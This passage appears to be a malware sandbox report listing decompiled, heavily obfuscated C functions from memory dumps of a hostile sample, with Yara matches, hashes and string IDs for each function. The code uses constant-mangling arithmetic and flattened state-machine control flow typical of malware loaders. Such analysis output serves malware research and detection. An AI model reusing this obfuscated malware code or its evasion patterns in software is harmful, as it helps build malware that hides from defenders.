                                              							} else {
                                              								_push(_t117);
                                              								_t112 = E002259D5(_t117, _v36, _t117, _v40, _v16);
                                              								_t117 =  *0x23ca30; // 0x0
                                              								_t131 =  &(_t131[5]);
                                              								_t129 = 0x15241428;
                                              								 *((intOrPtr*)(_t117 + 8)) = _t112;
                                              								continue;
                                              							}
                                              						}
                                              						goto L9;
                                              					}
                                              					_push(_t117);
                                              					_t105 = E00221132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E0022E377);
                                              					_t117 =  *0x23ca30; // 0x0
                                              					_t131 =  &(_t131[9]);
                                              					_t129 = 0x3afebe4c;
                                              					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
                                              					L8:
                                              				} while (_t129 != 0x3afebe4c);
                                              				L9:
                                              				return 0 | _t117 != 0x00000000;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: W:$\v;8$sV
                                              • API String ID: 0-492820393
                                              • Opcode ID: f43c86f462099f62eb88f7fdd6339907cf8ffeb19ccb006536e75fec421a179e
                                              • Instruction ID: c61a03dccfcbbad8564d908b1e445b1a335047823521a0ccf4919d1e82cfa99e
                                              • Opcode Fuzzy Hash: f43c86f462099f62eb88f7fdd6339907cf8ffeb19ccb006536e75fec421a179e
                                              • Instruction Fuzzy Hash: 9551AAB11183419FD758CF25D88A81BBBE1FB88358F500A1DF4C69A2A0D3B5CA59CF87
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0022E05A(void* __ecx, void* __edx) {
                                              				intOrPtr _v4;
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed short _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _t107;
                                              				signed short _t113;
                                              				signed short _t116;
                                              				signed short _t118;
                                              				signed int _t120;
                                              				signed int _t121;
                                              				signed int _t122;
                                              				signed int _t123;
                                              				intOrPtr _t124;
                                              				signed short _t128;
                                              				signed short* _t143;
                                              				signed short _t145;
                                              				void* _t146;
                                              				signed int* _t147;
                                              
                                              				_t147 =  &_v48;
                                              				_v16 = 0x6d293b;
                                              				_v12 = 0x468ef5;
                                              				_v8 = 0;
                                              				_v4 = 0;
                                              				_t146 = __ecx;
                                              				_v40 = 0x7b4e;
                                              				_v40 = _v40 + 0xffff3b83;
                                              				_v40 = _v40 + 0xffffa7a8;
                                              				_v40 = _v40 ^ 0xffff5e78;
                                              				_v20 = 0xb6a1;
                                              				_t120 = 0x38;
                                              				_v20 = _v20 / _t120;
                                              				_v20 = _v20 ^ 0x00007f71;
                                              				_v44 = 0x997f;
                                              				_v44 = _v44 ^ 0xba9196e9;
                                              				_v44 = _v44 ^ 0x66374254;
                                              				_t26 =  &_v44; // 0x66374254
                                              				_t121 = 0xe;
                                              				_v44 =  *_t26 / _t121;
                                              				_v44 = _v44 ^ 0x0fc29c0d;
                                              				_v48 = 0x4c26;
                                              				_v48 = _v48 | 0xfd76fef6;
                                              				_v48 = _v48 >> 3;
                                              				_v48 = _v48 ^ 0x1faed217;
                                              				_v24 = 0xc5b2;
                                              				_t122 = 0x42;
                                              				_v24 = _v24 * 0x67;
                                              				_v24 = _v24 << 9;
                                              				_v24 = _v24 ^ 0x9f1566f7;
                                              				_v28 = 0x55d;
                                              				_v28 = _v28 << 0xb;
                                              				_v28 = _v28 / _t122;
                                              				_v28 = _v28 ^ 0x0000f55e;
                                              				_v32 = 0x8f6f;
                                              				_t123 = 6;
                                              				_v32 = _v32 * 0x4f;
                                              				_v32 = _v32 + 0xffffe8fc;
                                              				_v32 = _v32 ^ 0x002c0f4c;
                                              				_v36 = 0xd672;
                                              				_v36 = _v36 / _t123;
                                              				_v36 = _v36 + 0xffffc0a7;
                                              				_v36 = _v36 ^ 0xffffa997;
                                              				_t107 = _v40;
                                              				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
                                              				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
                                              					L13:
                                              					return 1;
                                              				} else {
                                              					_t145 = _t124 + __ecx;
                                              					while(1) {
                                              						_t110 =  *((intOrPtr*)(_t145 + 0xc));
                                              						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
                                              							goto L13;
                                              						}
                                              						_t128 = E00234AAF(_t110 + _t146, _v20, _v44, _v48);
                                              						_v40 = _t128;
                                              						__eflags = _t128;
                                              						if(_t128 == 0) {
                                              							L15:
                                              							return 0;
                                              						}
                                              						_t143 =  *_t145 + _t146;
                                              						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
                                              						while(1) {
                                              							_t113 =  *_t143;
                                              							__eflags = _t113;
                                              							if(__eflags == 0) {
                                              								break;
                                              							}
                                              							if(__eflags >= 0) {
                                              								_t115 = _t113 + 2 + _t146;
                                              								__eflags = _t113 + 2 + _t146;
                                              							} else {
                                              								_t115 = _t113 & 0x0000ffff;
                                              							}
                                              							_t116 = E00226228(_v24, _v28, _v32, _v36, _t128, _t115);
                                              							_t147 =  &(_t147[4]);
                                              							__eflags = _t116;
                                              							if(_t116 == 0) {
                                              								goto L15;
                                              							} else {
                                              								_t128 = _v40;
                                              								_t143 =  &(_t143[2]);
                                              								 *_t118 = _t116;
                                              								_t118 = _t118 + 4;
                                              								__eflags = _t118;
                                              								continue;
                                              							}
                                              						}
                                              						_t145 = _t145 + 0x14;
                                              						__eflags = _t145;
                                              					}
                                              					goto L13;
                                              				}
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: &L$;)m$TB7f
                                              • API String ID: 0-1597752287
                                              • Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                              • Instruction ID: f3c6b082a39df2d2a2c127311500c8bdaf2cb5b1bd70c54df38eedd81d7104ea
                                              • Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                              • Instruction Fuzzy Hash: 7D51DBB12083029FD718CF25D84541BBBE1FFD4358F104A1DF89A9A261D3B4DA59CF86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 97%
                                              			E002361B8(void* __ecx) {
                                              				signed int _v4;
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				void* _t64;
                                              				void* _t68;
                                              				void* _t69;
                                              				signed int _t71;
                                              				void* _t75;
                                              				void* _t76;
                                              				signed int* _t78;
                                              
                                              				_t78 =  &_v24;
                                              				_v12 = 0x5dfc;
                                              				_v12 = _v12 * 0x23;
                                              				_t69 = __ecx;
                                              				_v12 = _v12 << 7;
                                              				_t75 = 0;
                                              				_v12 = _v12 ^ 0x066cb215;
                                              				_t76 = 0x1b4ca438;
                                              				_v24 = 0xd6f7;
                                              				_v24 = _v24 + 0xffffb773;
                                              				_v24 = _v24 + 0xd9f1;
                                              				_v24 = _v24 + 0xe528;
                                              				_v24 = _v24 ^ 0x000200e6;
                                              				_v16 = 0x64b4;
                                              				_v16 = _v16 + 0xda3f;
                                              				_v16 = _v16 >> 1;
                                              				_v16 = _v16 >> 0xd;
                                              				_v16 = _v16 ^ 0x0000725d;
                                              				_v4 = 0xc8c2;
                                              				_v4 = _v4 | 0x9945d150;
                                              				_v4 = _v4 + 0x9caf;
                                              				_v4 = _v4 ^ 0x99461e9f;
                                              				_v20 = 0xe019;
                                              				_t71 = 0x46;
                                              				_v20 = _v20 / _t71;
                                              				_v20 = _v20 >> 0xd;
                                              				_v20 = _v20 >> 4;
                                              				_v20 = _v20 ^ 0x00001f6d;
                                              				_v8 = 0xf95b;
                                              				_v8 = _v8 | 0x30645c78;
                                              				_v8 = _v8 + 0xffff8663;
                                              				_v8 = _v8 ^ 0x3064d0a8;
                                              				do {
                                              					while(_t76 != 0x108726d) {
                                              						if(_t76 == 0x1b4ca438) {
                                              							_t76 = 0x2a486598;
                                              							continue;
                                              						} else {
                                              							if(_t76 == 0x2a486598) {
                                              								_push(_t71);
                                              								_t68 = E00237F1B();
                                              								_t78 =  &(_t78[1]);
                                              								_t76 = 0x108726d;
                                              								_t75 = _t75 + _t68;
                                              								continue;
                                              							}
                                              						}
                                              						goto L7;
                                              					}
                                              					_t71 = _v16;
                                              					_t64 = E0022D64E(_t71, _v4, _v20, _t69 + 4, _v8);
                                              					_t78 =  &(_t78[3]);
                                              					_t76 = 0xee7d46d;
                                              					_t75 = _t75 + _t64;
                                              					L7:
                                              				} while (_t76 != 0xee7d46d);
                                              				return _t75;
                                              			}

















                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ($]r$x\d0
                                              • API String ID: 0-3053701899
                                              • Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                              • Instruction ID: e5ecf1a0709766e3ec296c9c5643fd799b8fed3d1f2e051c52c95c23f6bba54e
                                              • Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                              • Instruction Fuzzy Hash: 643185B28083429FD314DF54D88901BBBE0BBE4718F004E5DF8D9A6265D3B9CE188B93
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E00230B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				void* _t76;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t76);
                                              				_v16 = 0x6860;
                                              				_v16 = _v16 * 0x5b;
                                              				_v16 = _v16 ^ 0xdc6b4abd;
                                              				_v16 = _v16 ^ 0xdc4e778c;
                                              				_v32 = 0xa230;
                                              				_v32 = _v32 << 0xe;
                                              				_v32 = _v32 ^ 0x288c6565;
                                              				_v8 = 0xfe44;
                                              				_v8 = _v8 | 0x4c3583fb;
                                              				_v8 = _v8 + 0xfffff685;
                                              				_v8 = _v8 ^ 0x61a5c761;
                                              				_v8 = _v8 ^ 0x2d906c10;
                                              				_v40 = 0xe5db;
                                              				_v40 = _v40 | 0x9b65f6ba;
                                              				_v40 = _v40 ^ 0x9b65d356;
                                              				_v20 = 0x9adf;
                                              				_v20 = _v20 + 0x49d9;
                                              				_v20 = _v20 + 0xffff68ea;
                                              				_v20 = _v20 ^ 0x00005968;
                                              				_v36 = 0x94a7;
                                              				_v36 = _v36 ^ 0xf3da6fb3;
                                              				_v36 = _v36 ^ 0xf3dae7d2;
                                              				_v28 = 0xd25a;
                                              				_v28 = _v28 + 0x1e41;
                                              				_v28 = _v28 | 0x2f85fa9d;
                                              				_v28 = _v28 ^ 0x2f85d3ee;
                                              				_v12 = 0x5326;
                                              				_v12 = _v12 ^ 0x0ede0c0e;
                                              				_v12 = _v12 >> 7;
                                              				_v12 = _v12 << 4;
                                              				_v12 = _v12 ^ 0x01db8a0a;
                                              				_v24 = 0x6b2;
                                              				_v24 = _v24 << 4;
                                              				_v24 = _v24 | 0x9aa17d8a;
                                              				_t63 =  &_v24;
                                              				_v24 = _v24 ^ 0x9aa13f42;
                                              				_push(_v32);
                                              				_t91 = E0023889D(0x23c0b0, _v16,  *_t63);
                                              				E0022C680(__ecx, _v40, _v20, 0x23c0b0, _v36, _a12, _t79, _a4);
                                              				return E00232025(_v28, _t91, _v12, _v24);
                                              			}














                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: &S$`h$hY
                                              • API String ID: 0-860638928
                                              • Opcode ID: fdcdb3b1e2a54505ced5230819bb648828e9aec30cc72d6ae9c923b31416fdc6
                                              • Instruction ID: e202fd4ac2d76b1fe333a67a2c4e5903932de1a3364ecfb438eb4a33bab25221
                                              • Opcode Fuzzy Hash: fdcdb3b1e2a54505ced5230819bb648828e9aec30cc72d6ae9c923b31416fdc6
                                              • Instruction Fuzzy Hash: 45312FB1C00219EBDF49CFA1C94A8EEBFB5FF44314F208198E41276260D3B94A69DF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E10007F07(struct _EXCEPTION_POINTERS* _a4) {
                                              
                                              				SetUnhandledExceptionFilter(0);
                                              				return UnhandledExceptionFilter(_a4);
                                              			}



                                              0x10007f0c
                                              0x10007f1c

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 10007F0C
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 10007F15
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                              • Instruction ID: 7be572de92686af6165e4848987e7b2d669c1521723c7f37aea2a3297de6ad46
                                              • Opcode Fuzzy Hash: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                              • Instruction Fuzzy Hash: BAB09231044218BBEA003B91DC49BCC3F29EB056A2F004012F60D44064CF6256508AA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 68%
                                              			E00235A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				char _v556;
                                              				signed int _v560;
                                              				signed int _v564;
                                              				signed int _v568;
                                              				signed int _v572;
                                              				signed int _v576;
                                              				signed int _v580;
                                              				signed int _v584;
                                              				signed int _v588;
                                              				signed int _v592;
                                              				signed int _v596;
                                              				signed int _v600;
                                              				void* __ecx;
                                              				void* _t115;
                                              				signed int _t129;
                                              				void* _t136;
                                              				void* _t156;
                                              				signed int _t157;
                                              				signed int _t158;
                                              				signed int _t159;
                                              				signed int* _t163;
                                              
                                              				_push(_a16);
                                              				_t156 = __edx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				E0022602B(_t115);
                                              				_v564 = 0x4767;
                                              				_t163 =  &(( &_v600)[6]);
                                              				_v564 = _v564 << 9;
                                              				_v564 = _v564 ^ 0x008e895f;
                                              				_t136 = 0x30c826c8;
                                              				_v588 = 0x30cc;
                                              				_v588 = _v588 + 0x4702;
                                              				_t157 = 0x63;
                                              				_v588 = _v588 / _t157;
                                              				_v588 = _v588 + 0xb80e;
                                              				_v588 = _v588 ^ 0x0000cf36;
                                              				_v596 = 0xadf;
                                              				_t158 = 0x66;
                                              				_v596 = _v596 * 0x61;
                                              				_v596 = _v596 / _t158;
                                              				_t159 = 0x4c;
                                              				_v596 = _v596 / _t159;
                                              				_v596 = _v596 ^ 0x0000541c;
                                              				_v592 = 0x64b0;
                                              				_v592 = _v592 * 0x15;
                                              				_v592 = _v592 + 0xa35f;
                                              				_v592 = _v592 >> 0xe;
                                              				_v592 = _v592 ^ 0x0000251e;
                                              				_v600 = 0x3c82;
                                              				_v600 = _v600 | 0xdba50be5;
                                              				_v600 = _v600 ^ 0x0661176e;
                                              				_v600 = _v600 + 0x2491;
                                              				_v600 = _v600 ^ 0xddc40dba;
                                              				_v572 = 0x6631;
                                              				_v572 = _v572 + 0xffff287e;
                                              				_v572 = _v572 + 0x2e34;
                                              				_v572 = _v572 ^ 0xffff8a80;
                                              				_v584 = 0x3cf9;
                                              				_v584 = _v584 ^ 0x209cd78c;
                                              				_v584 = _v584 ^ 0x88ea975c;
                                              				_v584 = _v584 | 0x088f8ebb;
                                              				_v584 = _v584 ^ 0xa8ffe4fe;
                                              				_v560 = 0x5a99;
                                              				_v560 = _v560 << 2;
                                              				_v560 = _v560 ^ 0x0001627e;
                                              				_v576 = 0xc549;
                                              				_v576 = _v576 * 0x36;
                                              				_v576 = _v576 + 0xffff72cb;
                                              				_v576 = _v576 ^ 0x00296382;
                                              				_v568 = 0xc477;
                                              				_v568 = _v568 + 0xffff852d;
                                              				_v568 = _v568 ^ 0x00000bf7;
                                              				_t160 = _v568;
                                              				_v580 = 0xe5ab;
                                              				_v580 = _v580 + 0x26f9;
                                              				_v580 = _v580 + 0xffffb6c9;
                                              				_v580 = _v580 ^ 0x0000c36f;
                                              				do {
                                              					while(_t136 != 0x96b3cdc) {
                                              						if(_t136 == 0xc60f3b0) {
                                              							_t129 = E00239AC7(_v572, _v584,  &_v556, _v560, _t160);
                                              							_t163 =  &(_t163[3]);
                                              							L11:
                                              							asm("sbb ecx, ecx");
                                              							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
                                              							continue;
                                              						}
                                              						if(_t136 == 0x1f7f9ad4) {
                                              							_v556 = 0x22c;
                                              							_t129 = E002276F7( &_v556, _v592, _v600, _t160);
                                              							goto L11;
                                              						}
                                              						if(_t136 == 0x28d0c761) {
                                              							return E00234F7D(_v576, _v568, _t160);
                                              						}
                                              						if(_t136 != 0x2dc3f3d6) {
                                              							if(_t136 != 0x30c826c8) {
                                              								goto L16;
                                              							} else {
                                              								_t136 = 0x2dc3f3d6;
                                              								continue;
                                              							}
                                              							L19:
                                              							return _t129;
                                              						}
                                              						_t129 = E00221C88(_t136, _t136, _v580);
                                              						_t160 = _t129;
                                              						_t163 =  &(_t163[3]);
                                              						if(_t129 != 0xffffffff) {
                                              							_t136 = 0x1f7f9ad4;
                                              							continue;
                                              						}
                                              						goto L19;
                                              					}
                                              					_push(_t156);
                                              					_push( &_v556);
                                              					if(_a4() == 0) {
                                              						_t136 = 0x28d0c761;
                                              						goto L16;
                                              					} else {
                                              						_t136 = 0xc60f3b0;
                                              						continue;
                                              					}
                                              					goto L19;
                                              					L16:
                                              				} while (_t136 != 0x22b9bf83);
                                              				return _t129;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: 4.$gG
                                              • API String ID: 2962429428-791606841
                                              • Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                              • Instruction ID: e985022e8010a41c9e63120a226773281c2c4a34ee85c41d4a09bb8c301803b4
                                              • Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                              • Instruction Fuzzy Hash: 6E619EB11287419BD768DF24C88985FBBE0FBC4718F100E1DF58A962A0D7B58A59CB87
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0022B112() {
                                              				char _v520;
                                              				signed int _v524;
                                              				intOrPtr _v528;
                                              				intOrPtr _v532;
                                              				intOrPtr _v536;
                                              				signed int _v540;
                                              				signed int _v544;
                                              				signed int _v548;
                                              				signed int _v552;
                                              				signed int _v556;
                                              				signed int _v560;
                                              				signed int _v564;
                                              				signed int _v568;
                                              				char* _t91;
                                              				void* _t94;
                                              				intOrPtr _t97;
                                              				signed int _t109;
                                              				signed int _t110;
                                              				short* _t113;
                                              
                                              				_v524 = _v524 & 0x00000000;
                                              				_v536 = 0x15a9e0;
                                              				_t94 = 0x2447ce85;
                                              				_v532 = 0xcaf76;
                                              				_v528 = 0x42cbc4;
                                              				_v544 = 0x1d8c;
                                              				_v544 = _v544 << 8;
                                              				_v544 = _v544 ^ 0x001dbb75;
                                              				_v564 = 0xb98d;
                                              				_v564 = _v564 * 0x6d;
                                              				_v564 = _v564 | 0xb6682b1a;
                                              				_t109 = 0x16;
                                              				_v564 = _v564 / _t109;
                                              				_v564 = _v564 ^ 0x084aef85;
                                              				_v568 = 0xa53e;
                                              				_v568 = _v568 | 0x3e6d869d;
                                              				_t110 = 0x46;
                                              				_v568 = _v568 * 0x2b;
                                              				_v568 = _v568 ^ 0x7c6b3e02;
                                              				_v540 = 0x49b5;
                                              				_v540 = _v540 + 0xbc03;
                                              				_v540 = _v540 ^ 0x0001452b;
                                              				_v556 = 0x9474;
                                              				_v556 = _v556 << 0xb;
                                              				_v556 = _v556 ^ 0xd8ad9d33;
                                              				_v556 = _v556 ^ 0xdc0e2a5f;
                                              				_v560 = 0x11f0;
                                              				_v560 = _v560 + 0xffffe240;
                                              				_v560 = _v560 + 0xb761;
                                              				_v560 = _v560 ^ 0x000087cb;
                                              				_v548 = 0x2457;
                                              				_v548 = _v548 / _t110;
                                              				_v548 = _v548 ^ 0x000075df;
                                              				do {
                                              					while(_t94 != 0x14e9f4e4) {
                                              						if(_t94 == 0x21e9d2a8) {
                                              							_t97 =  *0x23ca2c; // 0x4d8300
                                              							_t82 = _t97 + 0x230; // 0x700047
                                              							return E00226636(_t82, _v556, _v560, _v548, _t113);
                                              						}
                                              						if(_t94 == 0x2275b3e1) {
                                              							_t91 = E00233E3F(_t94,  &_v520, __eflags, _v544, _v564);
                                              							_t94 = 0x14e9f4e4;
                                              							continue;
                                              						}
                                              						if(_t94 != 0x2447ce85) {
                                              							goto L15;
                                              						}
                                              						_t94 = 0x2275b3e1;
                                              					}
                                              					_v552 = 0xe342;
                                              					_v552 = _v552 ^ 0x7b193e87;
                                              					_v552 = _v552 ^ 0x7b19ddc7;
                                              					_t113 =  &_v520 + E00230ADC( &_v520, _v568, _v540) * 2;
                                              					while(1) {
                                              						_t91 =  &_v520;
                                              						__eflags = _t113 - _t91;
                                              						if(_t113 <= _t91) {
                                              							break;
                                              						}
                                              						__eflags =  *_t113 - 0x5c;
                                              						if( *_t113 != 0x5c) {
                                              							L10:
                                              							_t113 = _t113 - 2;
                                              							__eflags = _t113;
                                              							continue;
                                              						}
                                              						_t76 =  &_v552;
                                              						 *_t76 = _v552 - 1;
                                              						__eflags =  *_t76;
                                              						if( *_t76 == 0) {
                                              							__eflags = _t113;
                                              							L14:
                                              							_t94 = 0x21e9d2a8;
                                              							goto L15;
                                              						}
                                              						goto L10;
                                              					}
                                              					goto L14;
                                              					L15:
                                              					__eflags = _t94 - 0x318d27d3;
                                              				} while (__eflags != 0);
                                              				return _t91;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: B$W$
                                              • API String ID: 0-584637061
                                              • Opcode ID: 1f8b9d277b684e02cec951c9d03325fa66af6d15098b8e99b1f989bba8dbe267
                                              • Instruction ID: 3ad10d5a65a7e0da1b9b11e84fffa66bf23f5c36ed63e8a26dbd9b54e2d86b0c
                                              • Opcode Fuzzy Hash: 1f8b9d277b684e02cec951c9d03325fa66af6d15098b8e99b1f989bba8dbe267
                                              • Instruction Fuzzy Hash: 9D419771518312DBD314CF20E58955FBBE1FBC8758F104A1EF4896A1A0D7B48A0ACF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002331E2(void* __eflags) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				char _v52;
                                              				char _v572;
                                              				intOrPtr* _t106;
                                              				signed int _t110;
                                              				signed int _t111;
                                              
                                              				_v52 = 0;
                                              				_v28 = 0x38ff;
                                              				_v28 = _v28 | 0x657975a1;
                                              				_v28 = _v28 ^ 0x65795a60;
                                              				_v36 = 0xb7c2;
                                              				_t110 = 0x62;
                                              				_v36 = _v36 / _t110;
                                              				_v36 = _v36 ^ 0x0000110e;
                                              				_v24 = 0xe00a;
                                              				_v24 = _v24 << 5;
                                              				_v24 = _v24 + 0xffffb393;
                                              				_v24 = _v24 ^ 0x001b9d0d;
                                              				_v20 = 0xfb31;
                                              				_v20 = _v20 + 0xbdbd;
                                              				_v20 = _v20 + 0x1446;
                                              				_v20 = _v20 ^ 0x0001be9a;
                                              				_v40 = 0x7fef;
                                              				_v40 = _v40 >> 1;
                                              				_v40 = _v40 ^ 0x00001ed5;
                                              				_v8 = 0xf1c1;
                                              				_v8 = _v8 << 7;
                                              				_v8 = _v8 + 0x6d97;
                                              				_v8 = _v8 << 9;
                                              				_v8 = _v8 ^ 0xf29c2a73;
                                              				_v32 = 0xb6f2;
                                              				_v32 = _v32 | 0x667f3c4f;
                                              				_v32 = _v32 ^ 0x667f909f;
                                              				_v16 = 0xa641;
                                              				_t111 = 0x3c;
                                              				_v16 = _v16 / _t111;
                                              				_v16 = _v16 >> 7;
                                              				_v16 = _v16 ^ 0x1e480640;
                                              				_v16 = _v16 ^ 0x1e480386;
                                              				_v44 = 0xa73d;
                                              				_v44 = _v44 >> 0xd;
                                              				_v44 = _v44 ^ 0x000057d1;
                                              				_v48 = 0x6a4b;
                                              				_v48 = _v48 << 7;
                                              				_v48 = _v48 ^ 0x00354ae8;
                                              				_v12 = 0x27be;
                                              				_v12 = _v12 ^ 0xc55dd82d;
                                              				_v12 = _v12 >> 2;
                                              				_v12 = _v12 ^ 0xb51d94d3;
                                              				_v12 = _v12 ^ 0x844acffa;
                                              				_t112 = _v28;
                                              				if(E00221210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
                                              					_t106 =  &_v572;
                                              					if(_v572 != 0) {
                                              						while( *_t106 != 0x5c) {
                                              							_t106 = _t106 + 2;
                                              							if( *_t106 != 0) {
                                              								continue;
                                              							} else {
                                              							}
                                              							goto L6;
                                              						}
                                              						_t112 = 0;
                                              						 *((short*)(_t106 + 2)) = 0;
                                              					}
                                              					L6:
                                              					E0023375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
                                              				}
                                              				return _v52;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: `Zye$J5
                                              • API String ID: 0-1569392922
                                              • Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                              • Instruction ID: 3a9bc95902d7a869886f25d0ac34489c5f39069b06a243add85ba26fa5583d9a
                                              • Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                              • Instruction Fuzzy Hash: D34102B1D1021DEBEF59CFA0C94A9EEBBB5FB14304F108199E111B62A0D7B94B54CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E0023889D(signed int* __ecx, void* __edx, void* __eflags) {
                                              				void* _t50;
                                              				signed int _t57;
                                              				signed int _t74;
                                              				signed int _t75;
                                              				signed int _t84;
                                              				unsigned int _t85;
                                              				unsigned int _t86;
                                              				signed int _t93;
                                              				signed int _t94;
                                              				signed int* _t95;
                                              				signed int* _t96;
                                              				signed int _t97;
                                              				signed int _t98;
                                              				unsigned int _t100;
                                              				void* _t106;
                                              				short _t107;
                                              				void* _t108;
                                              				void* _t109;
                                              
                                              				_push( *((intOrPtr*)(_t108 + 0x30)));
                                              				_push(__ecx);
                                              				E0022602B(_t50);
